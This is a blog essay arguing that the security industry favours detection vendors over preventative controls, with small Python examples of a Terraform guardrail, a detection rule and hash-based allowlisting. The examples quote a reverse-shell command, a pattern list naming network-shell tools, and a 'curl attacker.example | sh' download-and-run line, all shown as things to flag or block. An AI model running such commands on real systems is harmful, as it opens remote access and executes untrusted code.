I attended RSA this year for the first time in over a decade. What stood out to me the most was the sheer number of vendors that exist today. You can’t help but notice how many more there are than back then, with more than 600 total this year. Of course, these are only those who attend RSA, and plenty choose not to participate for various reasons. There are estimated to be around 5,000 total security vendors, but even that number likely doesn’t include the small consultancies and open source teams out there.

A noticeable trend was that almost every vendor was either obtaining data, moving that data, or detecting patterns in the data. Identify vulnerabilities, check your security posture, obtain additional logs, collect more telemetry, pipe logs to your data lake, etc.

Very few attempt to address the problem at its source. You probably wouldn’t be happy if you hired a plumber, only to have them tell you they’ve located three leaks in your attic and then go home. Yet that’s exactly what we do in security.

Of course, good detection and response practices are needed too. Incidents will always happen, so detecting and responding effectively to those that get through will always be required. Ideally, though, we want to prevent vast swaths of issues before they become incidents.

In this blog, I’ll be diving further into what I call systemic prevention and why it’s so hard to solve security at scale.

Identification vs. Prevention Vendors

There are a few good examples of preventative tools. An easy one to understand is the comparison between vulnerability scanners and supply chain tools like Chainguard. The scanners tell you about problems but leave the fixes to you. Chainguard, meanwhile, just stops the issues from ever happening. Chainguard isn’t going to help you fix all your vulnerabilities, though, so it will only prevent a subset of the total.

Ideally, companies use both techniques to prevent vulns from occurring and identify the remainder. So many security teams forget that first step though. Engineering teams are often the ones to purchase tools like Chainguard because the security team has overwhelmed them with vulnerabilities and SLAs, leaving them to work out the problem themselves.

I think my point here was aptly put in Jason Chan’s recent article, where he said:

“I was chatting with someone from a well known large tech company about security culture, and she told me their CTO wanted every engineer at the company to think “security first”. Of course, as security folks, we love to hear this. It sets the tone from the top and provides a lot of energy and support for the security team. However, I told her that I had almost the opposite approach culturally. I want developers to focus on what they were hired to do.”

The Challenge

Building identification tools is relatively straightforward - build a better sensor, create cleaner dashboards, add more integrations. But actually fixing problems? That’s complicated, messy, and demands long-term horizons.

The chart below from the Verizon 2025 DBIR report shows that credential abuse is trending down. While this can be attributed to many factors, the growing adoption of password managers, SSO, passkeys, and automated controls to stop credential leaks (most of which are preventative in nature) certainly helps.

DBIR 2025 report

Based on this graph, it makes sense that, with developer AI tools getting better, the next focus will likely be on preventing vulnerabilities with automated patching and testing.

The Realm Of Tech Giants

It’s difficult to fix problems in large systems you don’t control, so prevention generally remains the domain of the tech giants who control the platforms. Some projects like passkeys required multiple large vendors to work together in their development. This historically has been… not great. Passkeys work great for enterprises but are still missing the mark for the wider public, and the fact that they do not work seamlessly across platforms is a massive contributor to that.

There are exceptions to the rule where small companies can grow rapidly with preventative tooling: Chainguard, 1Password, Resourcely, and more are clear examples, but they are the exception. Outside of vendors, memory-safe languages like Rust also prevent a lot of security issues before they happen.

The reality of most preventative security techniques is that there is one limiting factor: the big tech platforms have the most capacity (and incentive) to improve security. As a startup, you can’t secure an operating system or a browser. You can get logs for it, build IOC lists, and use logic to detect malicious behaviour. You can’t, however, easily change the underlying way it works to stop those things from occurring in the first place. At best, you can provide better data to help people turn on the existing security settings.

In addition, the big tech platforms directly compete with one another, giving them an incentive not to make cross-platform interoperability easy. Passkeys, as above, are a great example of this: different implementations across platforms really limit their grand potential. In an ideal world, passkeys would be agnostic, able to sync across multiple platforms with the same functionality on every one. Instead, we have tables like this one from passkeys.dev that are too complex for a normal person to understand, though perhaps in 10 years or so we’ll get close to having more green ticks.

state of passkeys

Consumers don’t generally pay for security. The B2C security market is incredibly small and generally taken up by a handful of VPNs and password managers. Big tech companies can use their leverage to fix security issues in platforms that affect both businesses and consumers.

The main point against platforms is that they make significant amounts of money selling services. It’s not impossible to think that eliminating issues would cut into consulting revenue, so platforms are hesitant to give up that recurring income. Look at most of the big EDR tools: they don’t support application allowlisting, and you need to go to smaller vendors for that. Every large security vendor has made a consulting acquisition lately, and the Red Canary one just adds to that.

Everyone’s Different

Every company is different, and what’s an exception in one place is normal somewhere else. This can make it challenging to build a one-size-fits-all product since there will be edge cases for most.

Resourcely is a great example of preventative security in the AppSec space. They provide a number of out-of-the-box preventative rules, via guardrails, to stop issues from happening in the first place. Some customers will just turn it on and it’ll work perfectly; most will have to spend a little time tuning; and for a number of edge-case companies, it’ll be a lot of work to get integrated. The more complexity in your organisation, the more likely this is to happen. Distributed teams with lots of freedom to do what they want will have more use cases a tool needs to cover than an organisation with a single paved path. This drives those companies further down the path of customisation, and they end up using fewer products because it’s so difficult to replace even simple use cases without significant organisational changes.
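To make the guardrail idea concrete, here is a minimal sketch (not Resourcely’s actual implementation, and the plan shape is simplified from `terraform show -json` output) of a preventative check that blocks a publicly readable S3 bucket before it is ever created:

```python
# Hypothetical guardrail: scan a Terraform plan's resource changes and
# flag anything that would create a publicly readable S3 bucket.

def find_violations(plan: dict) -> list:
    """Return addresses of planned resources that violate the guardrail."""
    violations = []
    for change in plan.get("resource_changes", []):
        after = (change.get("change") or {}).get("after") or {}
        if (change.get("type") == "aws_s3_bucket"
                and after.get("acl") in ("public-read", "public-read-write")):
            violations.append(change["address"])
    return violations

# Example plan fragment: one private bucket, one public one.
plan = {
    "resource_changes": [
        {"address": "aws_s3_bucket.logs", "type": "aws_s3_bucket",
         "change": {"after": {"acl": "private"}}},
        {"address": "aws_s3_bucket.assets", "type": "aws_s3_bucket",
         "change": {"after": {"acl": "public-read"}}},
    ]
}

# Only the public bucket is flagged, and it never reaches prod.
print(find_violations(plan))
```

Run in CI before `terraform apply`, a check like this is preventative in the sense used here: the misconfiguration is stopped at the source rather than detected in a scanner report weeks later.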

Normal vs Malicious Behaviour

It is extremely difficult to differentiate normal behaviour from malicious behaviour. Over the years, I’ve had all manner of weird behaviours pop up from staff for “legitimate” use cases.

This has included everything from scripts that run chmod -R 777 across prod every day to an employee reverse-shelling into their workstation with a custom binary. People do weird stuff, and we can’t realistically use education to train such specific behaviours away. Ideally, we stop people from doing these things when they happen; otherwise, they have a nasty habit of becoming integrated into workflows and then spreading wider.
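A toy sketch shows why this is so hard to productise. Assume a naive detection rule built on string patterns (the patterns and events below are invented for illustration):

```python
# Naive "dangerous command" rule: flag anything matching a known-bad pattern.
DANGEROUS_PATTERNS = ("chmod -R 777", "nc -e", "bash -i >&")

def is_suspicious(cmdline: str) -> bool:
    return any(pattern in cmdline for pattern in DANGEROUS_PATTERNS)

events = [
    "chmod -R 777 /srv/app/uploads",            # the daily "legitimate" prod script
    "ls -la /var/log",                          # plainly benign
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",   # classic reverse shell
]

flags = [event for event in events if is_suspicious(event)]
# Both the cron job and the reverse shell get flagged: the rule sees
# behaviour, not intent, which is why per-company tuning never ends.
```

The daily cron job and the attacker produce identical signals, so the vendor’s out-of-the-box rule either drowns the customer in false positives or gets tuned (and re-tuned) per company forever.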

The point here is that because every company is different, and malicious behaviour is so hard to distinguish from normal behaviour, providing out-of-the-box solutions that work for most of the population is difficult without lots of fine-tuning. That tuning is a constant endeavour that lasts forever. Plus, you now have to hire additional engineers to keep the tool running, adding to the long-term running cost.

Misalignment

An additional problem is that new security controls require everyone to adopt them. The trouble with writing a standard is that people will disagree, build their own standard, and then you’ve lost the benefits of centralisation.

It’s a miracle we managed to get single sign-on done on most SaaS applications. That in itself has taken more than 10 years and doesn’t include things like SCIM and single sign-out, which have limited coverage today. Just look at the recent discourse on authorization for MCP, and you can see much of the same problem. This isn’t a unique security problem, but we as engineers love to argue about the perfect solution, especially when everyone needs to adopt it.

Enter AI

Many people will read this blog and point to AI, saying that AI, paired with our collected data, will fix our problems. We simply won’t need preventive controls because AI-powered tools will fix everything.

The reality is that many of the above points block AI from being a real fix. You’re still going to have to tune good/bad behaviour, vendors still won’t support many of the preventive controls needed for AI to take action, and unless you’re all-in on one big platform, you’ll need glue to make things work together.

While we will likely increase our detection rates, it’s still entirely possible for attackers to bypass them, just like the controls of today. Of course, given enough time, I’ll likely be proved wrong, but I think the time horizon here is many years, not just a few.

Much of the talk on securing AI itself describes it as “biological”, in that you only control limited inputs. In this world, security issues are always present, and what matters is how the system responds and improves over time. Given this, I see only more threat surface rather than less; the big question is whether AI security tools can cover that difference.

Hope for the future?

I must admit that we have made some good progress. Look back over 3 years and you’ll see only minor changes; look back over 15 and you’ll see incredible progress. It’s easy to get disheartened, but change does take significant amounts of time, and our industry is still in its infancy.

Better identification has improved things, and even in the land of prevention, we’ve developed zero trust, passkeys, and more.

I do also think new takes on old ideas, some powered by AI, some powered by better UX and data, have a shot. I’m incredibly bullish on the next generation of application allowlisting and MCP-enhanced automated patching tools as areas with big potential here. True preventative controls that make attackers’ lives significantly harder are on the horizon, but they’ll take longer than you want.
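Allowlisting is worth dwelling on because it inverts the usual detection model. A toy sketch (hash-based, deny-by-default; the helper names are invented for illustration):

```python
# Toy application allowlisting: only binaries whose hash appears in an
# approved set may run. Deny-by-default is what makes this preventative
# rather than detective -- unknown code never executes at all.
import hashlib

APPROVED_HASHES = set()

def approve(binary: bytes) -> None:
    """Add a known-good binary's SHA-256 to the allowlist."""
    APPROVED_HASHES.add(hashlib.sha256(binary).hexdigest())

def may_execute(binary: bytes) -> bool:
    """Allow execution only if the binary's hash is on the allowlist."""
    return hashlib.sha256(binary).hexdigest() in APPROVED_HASHES

approve(b"#!/bin/sh\necho deploy")  # the known-good deploy script

assert may_execute(b"#!/bin/sh\necho deploy")            # runs as normal
assert not may_execute(b"curl attacker.example | sh")    # never executes
```

Real products layer signing, rules, and update workflows on top of this, but the core trade-off is the same one discussed above: the control is only as good as the effort spent keeping the allowlist current, which is where better UX and AI assistance could move the needle.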

I’ve also talked about sub-venture-scale problems: problems too small for VCs to care about, so they get no investment, even though they cause big pain. I think vibe coding has brought the cost of tackling these down to realistic levels, where you can fix them internally fast or potentially become a lifestyle dev.

Looking Forward

We need more people tackling the complex problem of preventative security, but it’s a tough sell. You’ll have a hard time building something that works for most people, so you’ll have fewer potential customers. Not to mention the big platforms can wipe you out if they come up with a platform solution, and they have both more data and closer integration with the tools people already use.

Plus, if you want to do preventative security internally at an enterprise, you’ll spend most of your time dealing with people and communications rather than tech. You’ll have to deal with people who critically need the workflows you’re removing, and they won’t always understand or care about the big-picture reasons why.

In 2025, it will be easier to build an LLM tool that spits out more data, and the market loves to invest in that rather than the long-term hard problems. Still, I think this is something worth striving for. After all, the best security incident is the one that never happens.